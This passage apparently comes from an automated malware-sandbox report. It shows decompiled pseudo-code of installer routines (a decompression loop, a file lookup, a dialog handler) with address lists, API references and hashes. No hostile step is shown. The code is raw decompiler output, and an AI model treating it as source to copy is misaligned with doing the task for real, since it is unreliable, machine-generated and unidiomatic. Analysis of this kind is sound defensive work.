                                                  							goto L108;
                                                  						case 0x1a:
                                                  							goto L55;
                                                  						case 0x1b:
                                                  							L75:
                                                  							__eflags =  *(__ebp - 0x64);
                                                  							if( *(__ebp - 0x64) == 0) {
                                                  								 *(__ebp - 0x88) = 0x1b;
                                                  								goto L170;
                                                  							}
                                                  							__eax =  *(__ebp - 0x14);
                                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  							__eflags = __eax -  *(__ebp - 0x74);
                                                  							if(__eax >=  *(__ebp - 0x74)) {
                                                  								__eax = __eax +  *(__ebp - 0x74);
                                                  								__eflags = __eax;
                                                  							}
                                                  							__edx =  *(__ebp - 8);
                                                  							__cl =  *(__eax + __edx);
                                                  							__eax =  *(__ebp - 0x14);
                                                  							 *(__ebp - 0x5c) = __cl;
                                                  							 *(__eax + __edx) = __cl;
                                                  							__eax = __eax + 1;
                                                  							__edx = 0;
                                                  							_t274 = __eax %  *(__ebp - 0x74);
                                                  							__eax = __eax /  *(__ebp - 0x74);
                                                  							__edx = _t274;
                                                  							__eax =  *(__ebp - 0x68);
                                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  							_t283 = __ebp - 0x64;
                                                  							 *_t283 =  *(__ebp - 0x64) - 1;
                                                  							__eflags =  *_t283;
                                                  							 *( *(__ebp - 0x68)) = __cl;
                                                  							goto L79;
                                                  						case 0x1c:
                                                  							while(1) {
                                                  								L123:
                                                  								__eflags =  *(__ebp - 0x64);
                                                  								if( *(__ebp - 0x64) == 0) {
                                                  									break;
                                                  								}
                                                  								__eax =  *(__ebp - 0x14);
                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                  									__eflags = __eax;
                                                  								}
                                                  								__edx =  *(__ebp - 8);
                                                  								__cl =  *(__eax + __edx);
                                                  								__eax =  *(__ebp - 0x14);
                                                  								 *(__ebp - 0x5c) = __cl;
                                                  								 *(__eax + __edx) = __cl;
                                                  								__eax = __eax + 1;
                                                  								__edx = 0;
                                                  								_t414 = __eax %  *(__ebp - 0x74);
                                                  								__eax = __eax /  *(__ebp - 0x74);
                                                  								__edx = _t414;
                                                  								__eax =  *(__ebp - 0x68);
                                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  								__eflags =  *(__ebp - 0x30);
                                                  								 *( *(__ebp - 0x68)) = __cl;
                                                  								 *(__ebp - 0x14) = __edx;
                                                  								if( *(__ebp - 0x30) > 0) {
                                                  									continue;
                                                  								} else {
                                                  									goto L80;
                                                  								}
                                                  							}
                                                  							 *(__ebp - 0x88) = 0x1c;
                                                  							goto L170;
                                                  					}
                                                  				}
                                                  			}













                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e23
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed3
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x0040710a
                                                  0x0040710a
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00000000
                                                  0x0040710d
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406eac
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x004075e5
                                                  0x004075ed
                                                  0x004075f4
                                                  0x004075f6
                                                  0x004075fd
                                                  0x00407601
                                                  0x00407601
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00000000
                                                  0x00406e1a
                                                  0x00406ea6
                                                  0x00406daf
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406bec
                                                  0x004075fa
                                                  0x004075fa
                                                  0x00000000
                                                  0x004075fa
                                                  0x00406bf2
                                                  0x00000000
                                                  0x00406bfd
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c06
                                                  0x00406c09
                                                  0x00406c0c
                                                  0x00406c10
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c16
                                                  0x00406c19
                                                  0x00406c1b
                                                  0x00406c1c
                                                  0x00406c1f
                                                  0x00406c21
                                                  0x00406c22
                                                  0x00406c24
                                                  0x00406c27
                                                  0x00406c2c
                                                  0x00406c31
                                                  0x00406c3a
                                                  0x00406c4d
                                                  0x00406c50
                                                  0x00406c5c
                                                  0x00406c84
                                                  0x00406c86
                                                  0x00406c94
                                                  0x00406c94
                                                  0x00406c98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c88
                                                  0x00406c8b
                                                  0x00406c8c
                                                  0x00406c8c
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c62
                                                  0x00406c67
                                                  0x00406c67
                                                  0x00406c70
                                                  0x00406c78
                                                  0x00406c7b
                                                  0x00000000
                                                  0x00406c81
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c9e
                                                  0x00406c9e
                                                  0x00406ca2
                                                  0x0040754e
                                                  0x00000000
                                                  0x0040754e
                                                  0x00406cab
                                                  0x00406cbb
                                                  0x00406cbe
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc4
                                                  0x00406cc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cca
                                                  0x00406cd0
                                                  0x00406cfa
                                                  0x00406d00
                                                  0x00406d07
                                                  0x00000000
                                                  0x00406d07
                                                  0x00406cd6
                                                  0x00406cd9
                                                  0x00406cde
                                                  0x00406cde
                                                  0x00406ce9
                                                  0x00406cf1
                                                  0x00406cf4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d39
                                                  0x00406d3f
                                                  0x00406d42
                                                  0x00406d4f
                                                  0x00406d57
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d0e
                                                  0x00406d0e
                                                  0x00406d12
                                                  0x0040755d
                                                  0x00000000
                                                  0x0040755d
                                                  0x00406d1e
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d2f
                                                  0x00406d32
                                                  0x00406d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ffe
                                                  0x00407002
                                                  0x00407020
                                                  0x00407023
                                                  0x0040702a
                                                  0x0040702d
                                                  0x00407030
                                                  0x00407033
                                                  0x00407036
                                                  0x00407039
                                                  0x0040703b
                                                  0x00407042
                                                  0x00407043
                                                  0x00407045
                                                  0x00407048
                                                  0x0040704b
                                                  0x0040704e
                                                  0x0040704e
                                                  0x00407053
                                                  0x00000000
                                                  0x00407053
                                                  0x00407004
                                                  0x00407007
                                                  0x0040700a
                                                  0x00407014
                                                  0x00000000
                                                  0x00000000
                                                  0x00407068
                                                  0x0040706c
                                                  0x0040708f
                                                  0x00407092
                                                  0x00407095
                                                  0x0040709f
                                                  0x0040706e
                                                  0x0040706e
                                                  0x00407071
                                                  0x00407074
                                                  0x00407077
                                                  0x00407084
                                                  0x00407087
                                                  0x00407087
                                                  0x00000000
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040711c
                                                  0x00407120
                                                  0x00407127
                                                  0x0040712a
                                                  0x0040712d
                                                  0x00407137
                                                  0x00000000
                                                  0x00407137
                                                  0x00407122
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x0040715d
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x00000000
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x00000000
                                                  0x004073c8
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                  • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                  • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                  • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040699E(WCHAR* _a4) {
                                                  				void* _t2;
                                                  
                                                  				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                  				if(_t2 == 0xffffffff) {
                                                  					return 0;
                                                  				}
                                                  				FindClose(_t2);
                                                  				return 0x426798;
                                                  			}





                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(772EFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560), ref: 004069A9
                                                  • FindClose.KERNEL32(00000000), ref: 004069B5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                  • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                  • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                  • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (function at 4040c5; legend: Executed / Not Executed)
                                                  C-Code - Quality: 84%
                                                  			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                  				struct HWND__* _v28;
                                                  				void* _v84;
                                                  				void* _v88;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t34;
                                                  				signed int _t36;
                                                  				signed int _t38;
                                                  				struct HWND__* _t48;
                                                  				signed int _t67;
                                                  				struct HWND__* _t73;
                                                  				signed int _t86;
                                                  				struct HWND__* _t91;
                                                  				signed int _t99;
                                                  				int _t103;
                                                  				signed int _t117;
                                                  				int _t118;
                                                  				int _t122;
                                                  				signed int _t124;
                                                  				struct HWND__* _t127;
                                                  				struct HWND__* _t128;
                                                  				int _t129;
                                                  				intOrPtr _t130;
                                                  				long _t133;
                                                  				int _t135;
                                                  				int _t136;
                                                  				void* _t137;
                                                  				void* _t145;
                                                  
                                                  				_t130 = _a8;
                                                  				if(_t130 == 0x110 || _t130 == 0x408) {
                                                  					_t34 = _a12;
                                                  					_t127 = _a4;
                                                  					__eflags = _t130 - 0x110;
                                                  					 *0x423730 = _t34;
                                                  					if(_t130 == 0x110) {
                                                  						 *0x42a268 = _t127;
                                                  						 *0x423744 = GetDlgItem(_t127, 1);
                                                  						_t91 = GetDlgItem(_t127, 2);
                                                  						_push(0xffffffff);
                                                  						_push(0x1c);
                                                  						 *0x421710 = _t91;
                                                  						E004045C4(_t127);
                                                  						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                                                  						 *0x42922c = E0040140B(4);
                                                  						_t34 = 1;
                                                  						__eflags = 1;
                                                  						 *0x423730 = 1;
                                                  					}
                                                  					_t124 =  *0x40a39c; // 0x0
                                                  					_t136 = 0;
                                                  					_t133 = (_t124 << 6) +  *0x42a280;
                                                  					__eflags = _t124;
                                                  					if(_t124 < 0) {
                                                  						L36:
                                                  						E00404610(0x40b);
                                                  						while(1) {
                                                  							_t36 =  *0x423730;
                                                  							 *0x40a39c =  *0x40a39c + _t36;
                                                  							_t133 = _t133 + (_t36 << 6);
                                                  							_t38 =  *0x40a39c; // 0x0
                                                  							__eflags = _t38 -  *0x42a284;
                                                  							if(_t38 ==  *0x42a284) {
                                                  								E0040140B(1);
                                                  							}
                                                  							__eflags =  *0x42922c - _t136;
                                                  							if( *0x42922c != _t136) {
                                                  								break;
                                                  							}
                                                  							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                  							if(__eflags >= 0) {
                                                  								break;
                                                  							}
                                                  							_t117 =  *(_t133 + 0x14);
                                                  							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                  							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                  							_push(0xfffffc19);
                                                  							E004045C4(_t127);
                                                  							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                  							_push(0xfffffc1b);
                                                  							E004045C4(_t127);
                                                  							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                  							_push(0xfffffc1a);
                                                  							E004045C4(_t127);
                                                  							_t48 = GetDlgItem(_t127, 3);
                                                  							__eflags =  *0x42a2ec - _t136;
                                                  							_v28 = _t48;
                                                  							if( *0x42a2ec != _t136) {
                                                  								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                  								__eflags = _t117;
                                                  							}
                                                  							ShowWindow(_t48, _t117 & 0x00000008);
                                                  							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                                  							E004045E6(_t117 & 0x00000002);
                                                  							_t118 = _t117 & 0x00000004;
                                                  							EnableWindow( *0x421710, _t118);
                                                  							__eflags = _t118 - _t136;
                                                  							if(_t118 == _t136) {
                                                  								_push(1);
                                                  							} else {
                                                  								_push(_t136);
                                                  							}
                                                  							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                  							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                  							__eflags =  *0x42a2ec - _t136;
                                                  							if( *0x42a2ec == _t136) {
                                                  								_push( *0x423744);
                                                  							} else {
                                                  								SendMessageW(_t127, 0x401, 2, _t136);
                                                  								_push( *0x421710);
                                                  							}
                                                  							E004045F9();
                                                  							E00406668(0x423748, E004040A6());
                                                  							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                  							SetWindowTextW(_t127, 0x423748);
                                                  							_push(_t136);
                                                  							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                  							__eflags = _t67;
                                                  							if(_t67 != 0) {
                                                  								continue;
                                                  							} else {
                                                  								__eflags =  *_t133 - _t136;
                                                  								if( *_t133 == _t136) {
                                                  									continue;
                                                  								}
                                                  								__eflags =  *(_t133 + 4) - 5;
                                                  								if( *(_t133 + 4) != 5) {
                                                  									DestroyWindow( *0x429238);
                                                  									 *0x422720 = _t133;
                                                  									__eflags =  *_t133 - _t136;
                                                  									if( *_t133 <= _t136) {
                                                  										goto L60;
                                                  									}
                                                  									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                                  									__eflags = _t73 - _t136;
                                                  									 *0x429238 = _t73;
                                                  									if(_t73 == _t136) {
                                                  										goto L60;
                                                  									}
                                                  									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                  									_push(6);
                                                  									E004045C4(_t73);
                                                  									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                  									ScreenToClient(_t127, _t137 + 0x10);
                                                  									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                  									_push(_t136);
                                                  									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                  									__eflags =  *0x42922c - _t136;
                                                  									if( *0x42922c != _t136) {
                                                  										goto L63;
                                                  									}
                                                  									ShowWindow( *0x429238, 8);
                                                  									E00404610(0x405);
                                                  									goto L60;
                                                  								}
                                                  								__eflags =  *0x42a2ec - _t136;
                                                  								if( *0x42a2ec != _t136) {
                                                  									goto L63;
                                                  								}
                                                  								__eflags =  *0x42a2e0 - _t136;
                                                  								if( *0x42a2e0 != _t136) {
                                                  									continue;
                                                  								}
                                                  								goto L63;
                                                  							}
                                                  						}
                                                  						DestroyWindow( *0x429238); // executed
                                                  						 *0x42a268 = _t136;
                                                  						EndDialog(_t127,  *0x421f18);
                                                  						goto L60;
                                                  					} else {
                                                  						__eflags = _t34 - 1;
                                                  						if(_t34 != 1) {
                                                  							L35:
                                                  							__eflags =  *_t133 - _t136;
                                                  							if( *_t133 == _t136) {
                                                  								goto L63;
                                                  							}
                                                  							goto L36;
                                                  						}
                                                  						_push(0);
                                                  						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                  						__eflags = _t86;
                                                  						if(_t86 == 0) {
                                                  							goto L35;
                                                  						}
                                                  						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                  						__eflags =  *0x42922c;
                                                  						return 0 |  *0x42922c == 0x00000000;
                                                  					}
                                                  				} else {
                                                  					_t127 = _a4;
                                                  					_t136 = 0;
                                                  					if(_t130 == 0x47) {
                                                  						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                  					}
                                                  					_t122 = _a12;
                                                  					if(_t130 != 5) {
                                                  						L8:
                                                  						if(_t130 != 0x40d) {
                                                  							__eflags = _t130 - 0x11;
                                                  							if(_t130 != 0x11) {
                                                  								__eflags = _t130 - 0x111;
                                                  								if(_t130 != 0x111) {
                                                  									goto L28;
                                                  								}
                                                  								_t135 = _t122 & 0x0000ffff;
                                                  								_t128 = GetDlgItem(_t127, _t135);
                                                  								__eflags = _t128 - _t136;
                                                  								if(_t128 == _t136) {
                                                  									L15:
                                                  									__eflags = _t135 - 1;
                                                  									if(_t135 != 1) {
                                                  										__eflags = _t135 - 3;
                                                  										if(_t135 != 3) {
                                                  											_t129 = 2;
                                                  											__eflags = _t135 - _t129;
                                                  											if(_t135 != _t129) {
                                                  												L27:
                                                  												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                  												goto L28;
                                                  											}
                                                  											__eflags =  *0x42a2ec - _t136;
                                                  											if( *0x42a2ec == _t136) {
                                                  												_t99 = E0040140B(3);
                                                  												__eflags = _t99;
                                                  												if(_t99 != 0) {
                                                  													goto L28;
                                                  												}
                                                  												 *0x421f18 = 1;
                                                  												L23:
                                                  												_push(0x78);
                                                  												L24:
                                                  												E0040459D();
                                                  												goto L28;
                                                  											}
                                                  											E0040140B(_t129);
                                                  											 *0x421f18 = _t129;
                                                  											goto L23;
                                                  										}
                                                  										__eflags =  *0x40a39c - _t136; // 0x0
                                                  										if(__eflags <= 0) {
                                                  											goto L27;
                                                  										}
                                                  										_push(0xffffffff);
                                                  										goto L24;
                                                  									}
                                                  									_push(_t135);
                                                  									goto L24;
                                                  								}
                                                  								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                  								_t103 = IsWindowEnabled(_t128);
                                                  								__eflags = _t103;
                                                  								if(_t103 == 0) {
                                                  									L63:
                                                  									return 0;
                                                  								}
                                                  								goto L15;
                                                  							}
                                                  							SetWindowLongW(_t127, _t136, _t136);
                                                  							return 1;
                                                  						}
                                                  						DestroyWindow( *0x429238);
                                                  						 *0x429238 = _t122;
                                                  						L60:
                                                  						_t145 =  *0x425748 - _t136; // 0x0
                                                  						if(_t145 == 0 &&  *0x429238 != _t136) {
                                                  							ShowWindow(_t127, 0xa);
                                                  							 *0x425748 = 1;
                                                  						}
                                                  						goto L63;
                                                  					} else {
                                                  						asm("sbb eax, eax");
                                                  						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                  						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                  							L28:
                                                  							return E0040462B(_a8, _t122, _a16);
                                                  						} else {
                                                  							ShowWindow(_t127, 4);
                                                  							goto L8;
                                                  						}
                                                  					}
                                                  				}
                                                  			}

































                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                  • ShowWindow.USER32(?), ref: 00404121
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                  • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                  • DestroyWindow.USER32 ref: 00404160
                                                  • SetWindowLongW.USER32 ref: 00404179
                                                  • GetDlgItem.USER32 ref: 00404198
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                  • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                  • GetDlgItem.USER32 ref: 0040425E
                                                  • GetDlgItem.USER32 ref: 00404268
                                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                  • GetDlgItem.USER32 ref: 00404379
                                                  • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                  • EnableWindow.USER32(?,?), ref: 004043AC
                                                  • EnableWindow.USER32(?,?), ref: 004043C7
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                  • EnableMenuItem.USER32 ref: 004043E4
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                  • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                  • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
